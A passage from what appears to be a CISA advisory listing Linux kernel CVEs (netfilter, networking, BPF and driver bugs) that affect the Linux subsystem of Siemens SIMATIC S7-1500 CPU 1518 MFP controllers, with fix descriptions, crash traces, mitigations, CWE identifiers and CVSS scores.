<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/364.html">CWE-364 Signal Handler Race Condition</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23274</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: xt_IDLETIMER: reject rev0 reuse of ALARM timer labels IDLETIMER revision 0 rules reuse existing timers by label and always call mod_timer() on timer-&gt;timer. If the label was created first by revision 1 with XT_IDLETIMER_ALARM, the object uses alarm timer semantics and timer-&gt;timer is never initialized. Reusing that object from revision 0 causes mod_timer() on an uninitialized timer_list, triggering debugobjects warnings and possible panic when panic_on_warn=1. Fix this by rejecting revision 0 rule insertion when an existing timer with the same label is of ALARM type.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23274">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/908.html">CWE-908 Use of Uninitialized Resource</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23277</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net/sched: teql: fix NULL pointer dereference in iptunnel_xmit on TEQL slave xmit teql_master_xmit() calls netdev_start_xmit(skb, slave) to transmit through slave devices, but does not update skb-&gt;dev to the slave device beforehand. When a gretap tunnel is a TEQL slave, the transmit path reaches iptunnel_xmit() which saves dev = skb-&gt;dev (still pointing to teql0 master) and later calls iptunnel_xmit_stats(dev, pkt_len). This function does: get_cpu_ptr(dev-&gt;tstats) Since teql_master_setup() does not set dev-&gt;pcpu_stat_type to NETDEV_PCPU_STAT_TSTATS, the core network stack never allocates tstats for teql0, so dev-&gt;tstats is NULL. get_cpu_ptr(NULL) computes NULL + __per_cpu_offset[cpu], resulting in a page fault. BUG: unable to handle page fault for address: ffff8880e6659018 #PF: supervisor write access in kernel mode #PF: error_code(0x0002) - not-present page PGD 68bc067 P4D 68bc067 PUD 0 Oops: Oops: 0002 [#1] SMP KASAN PTI RIP: 0010:iptunnel_xmit (./include/net/ip_tunnels.h:664 net/ipv4/ip_tunnel_core.c:89) Call Trace: ip_tunnel_xmit (net/ipv4/ip_tunnel.c:847) __gre_xmit (net/ipv4/ip_gre.c:478) gre_tap_xmit (net/ipv4/ip_gre.c:779) teql_master_xmit (net/sched/sch_teql.c:319) dev_hard_start_xmit (net/core/dev.c:3887) sch_direct_xmit (net/sched/sch_generic.c:347) __dev_queue_xmit (net/core/dev.c:4802) neigh_direct_output (net/core/neighbour.c:1660) ip_finish_output2 (net/ipv4/ip_output.c:237) __ip_finish_output.part.0 (net/ipv4/ip_output.c:315) ip_mc_output (net/ipv4/ip_output.c:369) ip_send_skb (net/ipv4/ip_output.c:1508) udp_send_skb (net/ipv4/udp.c:1195) udp_sendmsg (net/ipv4/udp.c:1485) inet_sendmsg (net/ipv4/af_inet.c:859) __sys_sendto (net/socket.c:2206) Fix this by setting skb-&gt;dev = slave before calling netdev_start_xmit(), so that tunnel xmit functions see the correct slave device with properly allocated tstats.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23277">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.9</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23284</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: ethernet: mtk_eth_soc: Reset prog ptr to old_prog in case of error in mtk_xdp_setup() Reset eBPF program pointer to old_prog and do not decrease its ref-count if mtk_open routine in mtk_xdp_setup() fails.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23284">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23287</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: irqchip/sifive-plic: Fix frozen interrupt due to affinity setting PLIC ignores interrupt completion message for disabled interrupt, explained by the specification: The PLIC signals it has completed executing an interrupt handler by writing the interrupt ID it received from the claim to the claim/complete register. The PLIC does not check whether the completion ID is the same as the last claim ID for that target. If the completion ID does not match an interrupt source that is currently enabled for the target, the completion is silently ignored. This caused problems in the past, because an interrupt can be disabled while still being handled and plic_irq_eoi() had no effect. That was fixed by checking if the interrupt is disabled, and if so enable it, before sending the completion message. That check is done with irqd_irq_disabled(). However, that is not sufficient because the enable bit for the handling hart can be zero despite irqd_irq_disabled(d) being false. This can happen when affinity setting is changed while a hart is still handling the interrupt. This problem is easily reproducible by dumping a large file to uart (which generates lots of interrupts) and at the same time keep changing the uart interrupt's affinity setting. The uart port becomes frozen almost instantaneously. Fix this by checking PLIC's enable bit instead of irqd_irq_disabled().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23287">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/367.html">CWE-367 Time-of-check Time-of-use (TOCTOU) Race Condition</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23290</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: usb: pegasus: validate USB endpoints The pegasus driver should validate that the device it is probing has the proper number and types of USB endpoints it is expecting before it binds to it. If a malicious device were to not have the same urbs the driver will crash later on when it blindly accesses these endpoints.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23290">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/909.html">CWE-909 Missing Initialization of Resource</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23293</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: vxlan: fix nd_tbl NULL dereference when IPv6 is disabled When booting with the 'ipv6.disable=1' parameter, the nd_tbl is never initialized because inet6_init() exits before ndisc_init() is called which initializes it. If an IPv6 packet is injected into the interface, route_shortcircuit() is called and a NULL pointer dereference happens on neigh_lookup(). BUG: kernel NULL pointer dereference, address: 0000000000000380 Oops: Oops: 0000 [#1] SMP NOPTI [...] RIP: 0010:neigh_lookup+0x20/0x270 [...] Call Trace: vxlan_xmit+0x638/0x1ef0 [vxlan] dev_hard_start_xmit+0x9e/0x2e0 __dev_queue_xmit+0xbee/0x14e0 packet_sendmsg+0x116f/0x1930 __sys_sendto+0x1f5/0x200 __x64_sys_sendto+0x24/0x30 do_syscall_64+0x12f/0x1590 entry_SYSCALL_64_after_hwframe+0x76/0x7e Fix this by adding an early check on route_shortcircuit() when protocol is ETH_P_IPV6. Note that ipv6_mod_enabled() cannot be used here because VXLAN can be built-in even when IPv6 is built as a module.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23293">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/824.html">CWE-824 Access of Uninitialized Pointer</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.9</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23300</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: ipv6: fix panic when IPv4 route references loopback IPv6 nexthop When a standalone IPv6 nexthop object is created with a loopback device (e.g., "ip -6 nexthop add id 100 dev lo"), fib6_nh_init() misclassifies it as a reject route. This is because nexthop objects have no destination prefix (fc_dst=::), causing fib6_is_reject() to match any loopback nexthop. The reject path skips fib_nh_common_init(), leaving nhc_pcpu_rth_output unallocated. If an IPv4 route later references this nexthop, __mkroute_output() dereferences NULL nhc_pcpu_rth_output and panics. Simplify the check in fib6_nh_init() to only match explicit reject routes (RTF_REJECT) instead of using fib6_is_reject(). The loopback promotion heuristic in fib6_is_reject() is handled separately by ip6_route_info_create_nh(). After this change, the three cases behave as follows: 1. Explicit reject route ("ip -6 route add unreachable 2001:db8::/64"): RTF_REJECT is set, enters reject path, skips fib_nh_common_init(). No behavior change. 2. Implicit loopback reject route ("ip -6 route add 2001:db8::/32 dev lo"): RTF_REJECT is not set, takes normal path, fib_nh_common_init() is called. ip6_route_info_create_nh() still promotes it to reject afterward. nhc_pcpu_rth_output is allocated but unused, which is harmless. 3. Standalone nexthop object ("ip -6 nexthop add id 100 dev lo"): RTF_REJECT is not set, takes normal path, fib_nh_common_init() is called. nhc_pcpu_rth_output is properly allocated, fixing the crash when IPv4 routes reference this nexthop.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23300">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/909.html">CWE-909 Missing Initialization of Resource</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23304</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ipv6: fix NULL pointer deref in ip6_rt_get_dev_rcu() l3mdev_master_dev_rcu() can return NULL when the slave device is being un-slaved from a VRF. All other callers deal with this, but we lost the fallback to loopback in ip6_rt_pcpu_alloc() -&gt; ip6_rt_get_dev_rcu() with commit 4832c30d5458 ("net: ipv6: put host and anycast routes on device with address"). KASAN: null-ptr-deref in range [0x0000000000000108-0x000000000000010f] RIP: 0010:ip6_rt_pcpu_alloc (net/ipv6/route.c:1418) Call Trace: ip6_pol_route (net/ipv6/route.c:2318) fib6_rule_lookup (net/ipv6/fib6_rules.c:115) ip6_route_output_flags (net/ipv6/route.c:2607) vrf_process_v6_outbound (drivers/net/vrf.c:437) I was tempted to rework the un-slaving code to clear the flag first and insert synchronize_rcu() before we remove the upper. But looks like the explicit fallback to loopback_dev is an established pattern. And I guess avoiding the synchronize_rcu() is nice, too.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23304">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.7</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23319</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: bpf: Fix a UAF issue in bpf_trampoline_link_cgroup_shim The root cause of this bug is that when 'bpf_link_put' reduces the refcount of 'shim_link-&gt;link.link' to zero, the resource is considered released but may still be referenced via 'tr-&gt;progs_hlist' in 'cgroup_shim_find'. The actual cleanup of 'tr-&gt;progs_hlist' in 'bpf_shim_tramp_link_release' is deferred. During this window, another process can cause a use-after-free via 'bpf_trampoline_link_cgroup_shim'. Based on Martin KaFai Lau's suggestions, I have created a simple patch. To fix this: Add an atomic non-zero check in 'bpf_trampoline_link_cgroup_shim'. Only increment the refcount if it is not already zero. Testing: I verified the fix by adding a delay in 'bpf_shim_tramp_link_release' to make the bug easier to trigger: static void bpf_shim_tramp_link_release(struct bpf_link *link) { /* ... */ if (!shim_link-&gt;trampoline) return; + msleep(100); WARN_ON_ONCE(bpf_trampoline_unlink_prog(&amp;shim_link-&gt;link, shim_link-&gt;trampoline, NULL)); bpf_trampoline_put(shim_link-&gt;trampoline); } Before the patch, running a PoC easily reproduced the crash(almost 100%) with a call trace similar to KaiyanM's report. After the patch, the bug no longer occurs even after millions of iterations.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23319">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
